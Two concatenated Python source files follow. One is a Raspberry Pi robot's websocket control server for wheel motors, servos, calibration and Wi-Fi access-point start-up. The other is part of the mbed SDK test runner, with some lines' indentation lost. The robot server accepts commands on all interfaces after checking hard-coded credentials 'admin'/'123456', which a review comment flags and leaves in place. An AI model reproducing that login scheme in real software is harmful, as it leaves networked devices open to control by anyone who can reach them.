    for token, port, state in actions:
        if token in command_input:
            switch.switch(port, state)
            break
def robotCtrl(command_input, response):
    """
    Handle a low-level motion command from the client.

    Drives the wheel motors (forward/backward/left/right and their stop
    variants) and the five servos: pan (P_sc, servo 14), tilt (T_sc, servo
    11), arm (H1_sc, servo 12), hand (H2_sc, servo 13) and gripper
    (G_sc, servo 15).
    """
    global direction_command, turn_command
    if 'forward' == command_input:
        direction_command = 'forward'
        move.move(speed_set, 'forward', 'no', rad)
    elif 'backward' == command_input:
        direction_command = 'backward'
        move.move(speed_set, 'backward', 'no', rad)
    elif 'DS' in command_input:
        # Direction stop: keep turning if a turn is still active.
        direction_command = 'no'
        if turn_command == 'no':
            move.move(speed_set, 'no', 'no', rad)
    elif 'left' == command_input:
        turn_command = 'left'
        move.move(speed_set, 'no', 'left', rad)
    elif 'right' == command_input:
        turn_command = 'right'
        move.move(speed_set, 'no', 'right', rad)
    elif 'TS' in command_input:
        # Turn stop: resume straight motion if a direction is still active.
        turn_command = 'no'
        if direction_command == 'no':
            move.move(speed_set, 'no', 'no', rad)
        else:
            move.move(speed_set, direction_command, 'no', rad)
    elif 'lookleft' == command_input:
        P_sc.singleServo(14, -1, 3)
    elif 'lookright' == command_input:
        P_sc.singleServo(14, 1, 3)
    elif 'LRstop' in command_input:
        P_sc.stopWiggle()
    elif 'up' == command_input:
        T_sc.singleServo(11, -1, 3)
    elif 'down' == command_input:
        T_sc.singleServo(11, 1, 3)
    elif 'UDstop' in command_input:
        T_sc.stopWiggle()
    elif 'handup' == command_input:
        H2_sc.singleServo(13, -1, 7)
    elif 'handdown' == command_input:
        H2_sc.singleServo(13, 1, 7)
    elif 'HAstop' in command_input:
        H2_sc.stopWiggle()
    elif 'armup' == command_input:
        H1_sc.singleServo(12, 1, 7)
    elif 'armdown' == command_input:
        H1_sc.singleServo(12, -1, 7)
    elif 'Armstop' in command_input:
        H1_sc.stopWiggle()
    elif 'grab' == command_input:
        G_sc.singleServo(15, 1, 3)
    elif 'loose' == command_input:
        G_sc.singleServo(15, -1, 3)
    elif 'stop' == command_input:
        G_sc.stopWiggle()
    elif 'home' == command_input:
        # BUGFIX: the original called P_sc.moveServoInit([11]) and
        # T_sc.moveServoInit([14]), but everywhere else in this file P_sc
        # drives servo 14 (pan) and T_sc drives servo 11 (tilt). The servo
        # numbers were swapped; home each controller's own servo.
        P_sc.moveServoInit([14])
        T_sc.moveServoInit([11])
        H1_sc.moveServoInit([12])
        H2_sc.moveServoInit([13])
        G_sc.moveServoInit([15])
def configPWM(command_input, response):
    """
    Handle servo calibration commands.

    ``SiLeft``/``SiRight`` nudge servo 0's centre position live; the
    ``PWM*MS`` commands persist the current position of one servo to
    RPIservo.py via replace_num; ``PWMINIT`` re-applies the stored
    positions; ``PWMD`` resets every servo to the 300 default.
    """
    global init_pwm0, init_pwm1, init_pwm2, init_pwm3, init_pwm4
    if 'SiLeft' == command_input:
        init_pwm0 += 1
        scGear.setPWM(0, init_pwm0)
    elif 'SiRight' == command_input:
        init_pwm0 -= 1
        # BUGFIX: the original wrote setPWM(0, -init_pwm0), driving the servo
        # to a negated position instead of the decremented one.
        scGear.setPWM(0, init_pwm0)
    elif 'PWM0MS' == command_input:
        scGear.initConfig(0, init_pwm0, 1)
        replace_num('init_pwm0 = ', init_pwm0)
    elif 'PWM1MS' == command_input:
        init_pwm1 = P_sc.lastPos[1]
        P_sc.initConfig(1, P_sc.lastPos[1], 1)
        replace_num('init_pwm1 = ', P_sc.lastPos[1])
    elif 'PWM2MS' == command_input:
        init_pwm2 = T_sc.lastPos[2]
        T_sc.initConfig(2, T_sc.lastPos[2], 1)
        print('LLLLLS',T_sc.lastPos[2])
        replace_num('init_pwm2 = ', T_sc.lastPos[2])
    elif 'PWM3MS' == command_input:
        # BUGFIX: the original used the undefined name `H_sc` (NameError).
        # H1_sc owns init slot 3 — NOTE(review): confirm against the wiring.
        init_pwm3 = H1_sc.lastPos[3]
        H1_sc.initConfig(3, H1_sc.lastPos[3], 1)
        replace_num('init_pwm3 = ', H1_sc.lastPos[3])
    elif 'PWM4MS' == command_input:
        init_pwm4 = G_sc.lastPos[4]
        G_sc.initConfig(4, G_sc.lastPos[4], 1)
        replace_num('init_pwm4 = ', G_sc.lastPos[4])
    elif 'PWMINIT' == command_input:
        print(init_pwm1)
        servoPosInit()
    elif 'PWMD' == command_input:
        # Reset every channel to the factory default of 300 and persist it.
        init_pwm0, init_pwm1, init_pwm2, init_pwm3, init_pwm4 = 300, 300, 300, 300, 300
        scGear.initConfig(0, init_pwm0, 1)
        replace_num('init_pwm0 = ', 300)
        P_sc.initConfig(1, 300, 1)
        replace_num('init_pwm1 = ', 300)
        T_sc.initConfig(2, 300, 1)
        replace_num('init_pwm2 = ', 300)
        # BUGFIX: `H_sc` was undefined here too; use H1_sc (slot 3).
        H1_sc.initConfig(3, 300, 1)
        replace_num('init_pwm3 = ', 300)
        G_sc.initConfig(4, 300, 1)
        replace_num('init_pwm4 = ', 300)
# NOTE(review): disabled self-update routine, kept as a module-level string
# literal; wifi_check() still contains a commented-out call to it.
'''
def update_code():
    # Update local to be consistent with remote
    projectPath = thisPath[:-7]
    with open(f'{projectPath}/config.json', 'r') as f1:
        config = json.load(f1)
    if not config['production']:
        print('Update code')
        # Force overwriting local code
        if os.system(f'cd {projectPath} && sudo git fetch --all && sudo git reset --hard origin/master && sudo git pull') == 0:
            print('Update successfully')
            print('Restarting...')
            os.system('sudo reboot')
'''
def wifi_check():
    """Show the current IP on the OLED when online, else start AP mode.

    Discovers the local IP by "connecting" a UDP socket towards 1.1.1.1
    (a UDP connect sends no traffic; it only selects the outgoing
    interface).  If that fails, the robot is assumed offline: an access
    point is brought up in a background thread while the OLED and LEDs
    animate start-up progress.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("1.1.1.1", 80))
        ipaddr_check = s.getsockname()[0]
        s.close()
        print(ipaddr_check)
        # update_code()
        if OLED_connection:
            screen.screen_show(2, 'IP:'+ipaddr_check)
            screen.screen_show(3, 'AP MODE OFF')
    except Exception:
        # Narrowed from a bare 'except:' so Ctrl-C / SystemExit still work.
        # No network: start the AP thread and animate the progress steps.
        ap_threading = threading.Thread(target=ap_thread)  # thread for data receiving
        ap_threading.daemon = True  # dies together with the main loop ('setDaemon' is deprecated)
        ap_threading.start()
        # (OLED percent label, blue LED intensity) ramp, 1 s per step —
        # identical sequence to the original unrolled code.
        for percent, blue in ((10, 50), (30, 100), (50, 150), (70, 200), (90, 255)):
            if OLED_connection:
                screen.screen_show(2, 'AP Starting %d%%' % percent)
            RL.setColor(0, 16, blue)
            time.sleep(1)
        if OLED_connection:
            screen.screen_show(2, 'AP Starting 100%')
        RL.setColor(35, 255, 35)
        if OLED_connection:
            screen.screen_show(2, 'IP:192.168.12.1')
            screen.screen_show(3, 'AP MODE ON')
async def check_permit(websocket):
    """Loop until the client authenticates with 'user:password'.

    Returns True once valid credentials arrive; on every bad attempt an
    error string is sent back and the loop continues.

    SECURITY NOTE: credentials are hard-coded ("admin"/"123456") — flagged
    for review, left unchanged to keep existing clients working.
    """
    while True:
        recv_str = await websocket.recv()
        cred_dict = recv_str.split(":")
        # BUGFIX: guard the field count — a message without ':' previously
        # raised IndexError on cred_dict[1] and killed the connection task.
        if len(cred_dict) >= 2 and cred_dict[0] == "admin" and cred_dict[1] == "123456":
            response_str = "congratulation, you have connect with server\r\nnow, you can do something else"
            await websocket.send(response_str)
            return True
        else:
            response_str = "sorry, the username or password is wrong, please submit again"
            await websocket.send(response_str)
async def recv_msg(websocket):
    """Main per-client command loop.

    Receives messages forever, dispatches plain-string commands to every
    control handler (each handler ignores commands it does not recognise),
    handles dict-shaped messages, and answers every message with a JSON
    response of the form {'status', 'title', 'data'}.
    """
    global speed_set, modeSelect
    move.setup()
    # NOTE(review): these two locals are never read in this function —
    # presumably leftovers from an older protocol; confirm before removing.
    direction_command = 'no'
    turn_command = 'no'
    while True:
        response = {
            'status' : 'ok',
            'title' : '',
            'data' : None
        }
        data = ''
        data = await websocket.recv()
        try:
            data = json.loads(data)
        except Exception as e:
            # Plain-text commands are expected too; keep the raw string.
            print('not A JSON')
        if not data:
            continue
        if isinstance(data,str):
            # Fan the command out to all handlers.
            robotCtrl(data, response)
            switchCtrl(data, response)
            functionSelect(data, response)
            configPWM(data, response)
            if 'get_info' == data:
                # CPU temperature / CPU load / RAM usage snapshot.
                response['title'] = 'get_info'
                response['data'] = [info.get_cpu_tempfunc(), info.get_cpu_use(), info.get_ram_info()]
            if 'wsB' in data:
                # "wsB <n>": set movement speed; malformed input is ignored.
                try:
                    set_B=data.split()
                    speed_set = int(set_B[1])
                except:
                    pass
            elif 'AR' == data:
                modeSelect = 'AR'
                screen.screen_show(4, 'ARM MODE ON')
                try:
                    fpv.changeMode('ARM MODE ON')
                except:
                    pass
            elif 'PT' == data:
                modeSelect = 'PT'
                screen.screen_show(4, 'PT MODE ON')
                try:
                    fpv.changeMode('PT MODE ON')
                except:
                    pass
            #CVFL
            elif 'CVFL' == data:
                flask_app.modeselect('findlineCV')
            elif 'CVFLColorSet' in data:
                color = int(data.split()[1])
                flask_app.camera.colorSet(color)
            elif 'CVFLL1' in data:
                pos = int(data.split()[1])
                flask_app.camera.linePosSet_1(pos)
            elif 'CVFLL2' in data:
                pos = int(data.split()[1])
                flask_app.camera.linePosSet_2(pos)
            elif 'CVFLSP' in data:
                err = int(data.split()[1])
                flask_app.camera.errorSet(err)
            elif 'defEC' in data:#Z
                fpv.defaultExpCom()
        elif(isinstance(data,dict)):
            # Structured message: currently only the colour-picker payload.
            if data['title'] == "findColorSet":
                color = data['data']
                flask_app.colorFindSet(color[0],color[1],color[2])
        if not functionMode:
            if OLED_connection:
                screen.screen_show(5,'Functions OFF')
        else:
            pass
        print(data)
        response = json.dumps(response)
        await websocket.send(response)
async def main_logic(websocket, path):
    """Per-connection handler: authenticate first, then serve commands."""
    for stage in (check_permit, recv_msg):
        await stage(websocket)
if __name__ == '__main__':
    # Entry point: initialise GPIO switches, the Flask camera app and the
    # LED strip, then serve the websocket control protocol forever.
    switch.switchSetup()
    switch.set_all_switch_off()
    HOST = ''
    PORT = 10223  #Define port serial
    BUFSIZ = 1024  #Define buffer size
    ADDR = (HOST, PORT)
    # NOTE(review): 'global' at module level is a no-op; kept as-is.
    global flask_app
    flask_app = app.webapp()
    flask_app.startthread()
    try:
        RL=robotLight.RobotLight()
        RL.start()
        RL.breath(70,70,255)
    except ModuleNotFoundError as e:
        print('Use "sudo pip3 install rpi_ws281x" to install WS_281x package\n使用"sudo pip3 install rpi_ws281x"命令来安装rpi_ws281x')
        pass
    # Retry loop: (re)check connectivity, then try to bind the websocket
    # server; loop again on failure (e.g. port still in use).
    while 1:
        wifi_check()
        try:  #Start server,waiting for client
            start_server = websockets.serve(main_logic, '0.0.0.0', 8888)
            asyncio.get_event_loop().run_until_complete(start_server)
            print('waiting for connection...')
            # print('...connected from :', addr)
            break
        except Exception as e:
            print(e)
            RL.setColor(0,0,0)
        try:
            RL.setColor(0,80,255)
        except:
            pass
    try:
        # Run the event loop until interrupted; on any error shut the LEDs
        # and motors down before exiting.
        asyncio.get_event_loop().run_forever()
    except Exception as e:
        print(e)
        RL.setColor(0,0,0)
        move.destroy()
|
test_api.py | """
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from copy import copy
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename, relpath
from threading import Thread, Lock
from multiprocessing import Pool, cpu_count
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.memap import MemapParser
from tools.targets import TARGET_MAP
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import prepare_toolchain
from tools.build_api import scan_resources
from tools.build_api import get_config
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.options import extract_profile
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
from tools.utils import get_path_depth
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
    """Background reader pumping a child process's stdout into a queue.

    Each item put on ``self.queue`` is a single character/byte read from
    ``proc.stdout``; consumers drain the queue with their own timeouts.
    The thread is a daemon and starts itself on construction.
    """
    def __init__(self, proc):
        Thread.__init__(self)
        self.proc = proc
        self.queue = Queue()
        self.daemon = True
        self.active = True
        self.start()

    def run(self):
        while self.active:
            c = self.proc.stdout.read(1)
            # BUGFIX: an empty read means EOF (child closed stdout).
            # Previously the loop kept spinning at full CPU, flooding the
            # queue with empty strings until stop() was called.
            if not c:
                break
            self.queue.put(c)

    def stop(self):
        self.active = False
        try:
            self.proc.terminate()
        # 'except Exception, _:' was Python-2-only syntax; this form is
        # valid on both Python 2.6+ and Python 3.
        except Exception:
            pass
class SingleTestExecutor(threading.Thread):
    """ Example: Single test class in separate thread usage
    """
    def __init__(self, single_test):
        # single_test: a configured SingleTestRunner instance.
        self.single_test = single_test
        threading.Thread.__init__(self)
    def run(self):
        # Runs the whole suite and prints the human-readable summaries.
        start = time()
        # Execute tests depending on options and filter applied
        # NOTE(review): SingleTestRunner.execute() returns a 6-tuple (see its
        # return statement below) — unpacking 4 values here would raise
        # ValueError; confirm whether this class is still used and fix.
        test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
        elapsed_time = time() - start
        # Human readable summary
        if not self.single_test.opts_suppress_summary:
            # prints well-formed summary with results (SQL table like)
            print self.single_test.generate_test_summary(test_summary, shuffle_seed)
        if self.single_test.opts_test_x_toolchain_summary:
            # prints well-formed summary with results (SQL table like)
            # table shows text x toolchain test result matrix
            print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
        print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
    """ Object wrapper for single test run which may involve multiple MUTs
    """
    # Compiled in __init__ from the keys of TEST_RESULT_MAPPING; used to
    # detect "{result_token}" markers in host-test output.
    RE_DETECT_TESTCASE_RESULT = None
    # Return codes for test script
    TEST_RESULT_OK = "OK"
    TEST_RESULT_FAIL = "FAIL"
    TEST_RESULT_ERROR = "ERROR"
    TEST_RESULT_UNDEF = "UNDEF"
    TEST_RESULT_IOERR_COPY = "IOERR_COPY"
    TEST_RESULT_IOERR_DISK = "IOERR_DISK"
    TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
    TEST_RESULT_TIMEOUT = "TIMEOUT"
    TEST_RESULT_NO_IMAGE = "NO_IMAGE"
    TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
    TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
    TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
    GLOBAL_LOOPS_COUNT = 1  # How many times each test should be repeated
    TEST_LOOPS_LIST = []    # We redefine no.of loops per test_id
    TEST_LOOPS_DICT = {}    # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
    muts = {}       # MUTs descriptor (from external file)
    test_spec = {}  # Test specification (from external file)
    # mbed test suite -> SingleTestRunner
    TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
                           "failure" : TEST_RESULT_FAIL,
                           "error" : TEST_RESULT_ERROR,
                           "ioerr_copy" : TEST_RESULT_IOERR_COPY,
                           "ioerr_disk" : TEST_RESULT_IOERR_DISK,
                           "ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
                           "timeout" : TEST_RESULT_TIMEOUT,
                           "no_image" : TEST_RESULT_NO_IMAGE,
                           "end" : TEST_RESULT_UNDEF,
                           "mbed_assert" : TEST_RESULT_MBED_ASSERT,
                           "build_failed" : TEST_RESULT_BUILD_FAILED,
                           # NOTE(review): the 'not_supproted' typo looks like the
                           # exact token emitted by host tests — confirm before fixing.
                           "not_supproted" : TEST_RESULT_NOT_SUPPORTED
    }
    def __init__(self,
                 _global_loops_count=1,
                 _test_loops_list=None,
                 _muts={},
                 _clean=False,
                 _parser=None,
                 _opts=None,
                 _opts_db_url=None,
                 _opts_log_file_name=None,
                 _opts_report_html_file_name=None,
                 _opts_report_junit_file_name=None,
                 _opts_report_build_file_name=None,
                 _opts_report_text_file_name=None,
                 _opts_build_report={},
                 _opts_build_properties={},
                 _test_spec={},
                 _opts_goanna_for_mbed_sdk=None,
                 _opts_goanna_for_tests=None,
                 _opts_shuffle_test_order=False,
                 _opts_shuffle_test_seed=None,
                 _opts_test_by_names=None,
                 _opts_peripheral_by_names=None,
                 _opts_test_only_peripheral=False,
                 _opts_test_only_common=False,
                 _opts_verbose_skipped_tests=False,
                 _opts_verbose_test_result_only=False,
                 _opts_verbose=False,
                 _opts_firmware_global_name=None,
                 _opts_only_build_tests=False,
                 _opts_parallel_test_exec=False,
                 _opts_suppress_summary=False,
                 _opts_test_x_toolchain_summary=False,
                 _opts_copy_method=None,
                 _opts_mut_reset_type=None,
                 _opts_jobs=None,
                 _opts_waterfall_test=None,
                 _opts_consolidate_waterfall_test=None,
                 _opts_extend_test_timeout=None,
                 _opts_auto_detect=None,
                 _opts_include_non_automated=False):
        """ Initialise the runner from command-line style options.

        Most parameters are direct mirrors of CLI flags and are stored as
        self.opts_* attributes; see dump_options() for the exported subset.
        NOTE(review): the mutable default arguments (_muts={}, _test_spec={},
        _opts_build_report={}, _opts_build_properties={}) are shared across
        calls — safe only if callers always pass their own dicts; confirm.
        """
        from colorama import init
        init()
        # Regex matching any "{<result token>}" emitted by host tests.
        PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
        self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
        # Settings related to test loops counters
        try:
            _global_loops_count = int(_global_loops_count)
        except:
            _global_loops_count = 1
        if _global_loops_count < 1:
            _global_loops_count = 1
        self.GLOBAL_LOOPS_COUNT = _global_loops_count
        self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
        self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
        self.shuffle_random_seed = 0.0
        self.SHUFFLE_SEED_ROUND = 10
        # MUT list and test specification storage
        self.muts = _muts
        self.test_spec = _test_spec
        # Settings passed e.g. from command line
        self.opts_db_url = _opts_db_url
        self.opts_log_file_name = _opts_log_file_name
        self.opts_report_html_file_name = _opts_report_html_file_name
        self.opts_report_junit_file_name = _opts_report_junit_file_name
        self.opts_report_build_file_name = _opts_report_build_file_name
        self.opts_report_text_file_name = _opts_report_text_file_name
        self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
        self.opts_goanna_for_tests = _opts_goanna_for_tests
        self.opts_shuffle_test_order = _opts_shuffle_test_order
        self.opts_shuffle_test_seed = _opts_shuffle_test_seed
        self.opts_test_by_names = _opts_test_by_names
        self.opts_peripheral_by_names = _opts_peripheral_by_names
        self.opts_test_only_peripheral = _opts_test_only_peripheral
        self.opts_test_only_common = _opts_test_only_common
        self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
        self.opts_verbose_test_result_only = _opts_verbose_test_result_only
        self.opts_verbose = _opts_verbose
        self.opts_firmware_global_name = _opts_firmware_global_name
        self.opts_only_build_tests = _opts_only_build_tests
        self.opts_parallel_test_exec = _opts_parallel_test_exec
        self.opts_suppress_summary = _opts_suppress_summary
        self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
        self.opts_copy_method = _opts_copy_method
        self.opts_mut_reset_type = _opts_mut_reset_type
        self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
        self.opts_waterfall_test = _opts_waterfall_test
        self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
        self.opts_extend_test_timeout = _opts_extend_test_timeout
        self.opts_clean = _clean
        self.opts_parser = _parser
        self.opts = _opts
        self.opts_auto_detect = _opts_auto_detect
        self.opts_include_non_automated = _opts_include_non_automated
        self.build_report = _opts_build_report
        self.build_properties = _opts_build_properties
        # File / screen logger initialization
        self.logger = CLITestLogger(file_name=self.opts_log_file_name)  # Default test logger
        # Database related initializations
        self.db_logger = factory_db_logger(self.opts_db_url)
        self.db_logger_build_id = None  # Build ID (database index of build_id table)
        # Let's connect to database to set up credentials and confirm database is ready
        if self.db_logger:
            self.db_logger.connect_url(self.opts_db_url)  # Save db access info inside db_logger object
            if self.db_logger.is_connected():
                # Get hostname and uname so we can use it as build description
                # when creating new build_id in external database
                (_hostname, _uname) = self.db_logger.get_hostname()
                _host_location = os.path.dirname(os.path.abspath(__file__))
                build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
                self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
                self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
    def shuffle_random_func(self):
        # Passed as the 'random' argument to random.shuffle() so the test
        # order shuffle is reproducible from self.shuffle_random_seed.
        return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
    def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
        """Build mbed libs, the required libraries and every valid test for
        one target across the given toolchains, then run the tests (unless
        only-build mode is set).  Signals completion by putting a token on
        the queue *q*.
        """
        for toolchain in toolchains:
            tt_id = "%s::%s" % (toolchain, target)
            T = TARGET_MAP[target]
            # print target, toolchain
            # Test suite properties returned to external tools like CI
            test_suite_properties = {
                'jobs': self.opts_jobs,
                'clean': clean,
                'target': target,
                'vendor': T.extra_labels[0],
                'test_ids': ', '.join(test_ids),
                'toolchain': toolchain,
                'shuffle_random_seed': self.shuffle_random_seed
            }
            # print '=== %s::%s ===' % (target, toolchain)
            # Let's build our test
            if target not in TARGET_MAP:
                print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
                continue
            clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
            profile = extract_profile(self.opts_parser, self.opts, toolchain)
            try:
                build_mbed_libs_result = build_mbed_libs(T,
                                                         toolchain,
                                                         clean=clean_mbed_libs_options,
                                                         verbose=self.opts_verbose,
                                                         jobs=self.opts_jobs,
                                                         report=build_report,
                                                         properties=build_properties,
                                                         build_profile=profile)
                if not build_mbed_libs_result:
                    print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
                    continue
            except ToolException:
                print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
                continue
            build_dir = join(BUILD_DIR, "test", target, toolchain)
            test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
            test_suite_properties['build_dir'] = build_dir
            test_suite_properties['skipped'] = []
            # Enumerate through all tests and shuffle test order if requested
            test_map_keys = sorted(TEST_MAP.keys())
            if self.opts_shuffle_test_order:
                random.shuffle(test_map_keys, self.shuffle_random_func)
                # Update database with shuffle seed f applicable
                if self.db_logger:
                    self.db_logger.reconnect();
                    if self.db_logger.is_connected():
                        self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
                        self.db_logger.disconnect();
            if self.db_logger:
                self.db_logger.reconnect();
                if self.db_logger.is_connected():
                    # Update MUTs and Test Specification in database
                    self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
                    # Update Extra information in database (some options passed to test suite)
                    self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
                    self.db_logger.disconnect();
            valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
            skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
            for skipped_test_id in skipped_test_map_keys:
                test_suite_properties['skipped'].append(skipped_test_id)
            # First pass through all tests and determine which libraries need to be built
            libraries = []
            for test_id in valid_test_map_keys:
                test = TEST_MAP[test_id]
                # Detect which lib should be added to test
                # Some libs have to compiled like RTOS or ETH
                for lib in LIBRARIES:
                    if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
                        libraries.append(lib['id'])
            clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
            # Build all required libraries
            for lib_id in libraries:
                try:
                    build_lib(lib_id,
                              T,
                              toolchain,
                              verbose=self.opts_verbose,
                              clean=clean_mbed_libs_options,
                              jobs=self.opts_jobs,
                              report=build_report,
                              properties=build_properties,
                              build_profile=profile)
                except ToolException:
                    print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
                    continue
            # Second pass: build and (optionally) run each valid test.
            for test_id in valid_test_map_keys:
                test = TEST_MAP[test_id]
                test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
                # TODO: move this 2 below loops to separate function
                INC_DIRS = []
                for lib_id in libraries:
                    if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
                        INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
                MACROS = []
                for lib_id in libraries:
                    if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
                        MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
                MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
                MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
                test_uuid = uuid.uuid4()
                MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
                # Prepare extended test results data structure (it can be used to generate detailed test report)
                if target not in self.test_summary_ext:
                    self.test_summary_ext[target] = {}  # test_summary_ext : toolchain
                if toolchain not in self.test_summary_ext[target]:
                    self.test_summary_ext[target][toolchain] = {}  # test_summary_ext : toolchain : target
                tt_test_id = "%s::%s::%s" % (toolchain, target, test_id)  # For logging only
                project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
                try:
                    path = build_project(test.source_dir,
                                         join(build_dir, test_id),
                                         T,
                                         toolchain,
                                         test.dependencies,
                                         clean=clean_project_options,
                                         verbose=self.opts_verbose,
                                         name=project_name,
                                         macros=MACROS,
                                         inc_dirs=INC_DIRS,
                                         jobs=self.opts_jobs,
                                         report=build_report,
                                         properties=build_properties,
                                         project_id=test_id,
                                         project_description=test.get_description(),
                                         build_profile=profile)
                except Exception, e:
                    project_name_str = project_name if project_name is not None else test_id
                    test_result = self.TEST_RESULT_FAIL
                    if isinstance(e, ToolException):
                        print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
                        test_result = self.TEST_RESULT_BUILD_FAILED
                    elif isinstance(e, NotSupportedException):
                        print self.logger.log_line(self.logger.LogType.INFO, 'The project %s is not supported'% (project_name_str))
                        test_result = self.TEST_RESULT_NOT_SUPPORTED
                    # Append test results to global test summary
                    self.test_summary.append(
                        (test_result, target, toolchain, test_id, test.get_description(), 0, 0, '-')
                    )
                    # Add detailed test result to test summary structure
                    if test_id not in self.test_summary_ext[target][toolchain]:
                        self.test_summary_ext[target][toolchain][test_id] = []
                    self.test_summary_ext[target][toolchain][test_id].append({ 0: {
                        'result' : test_result,
                        'output' : '',
                        'target_name' : target,
                        'target_name_unique': target,
                        'toolchain_name' : toolchain,
                        'id' : test_id,
                        'description' : test.get_description(),
                        'elapsed_time' : 0,
                        'duration' : 0,
                        'copy_method' : None
                    }})
                    continue
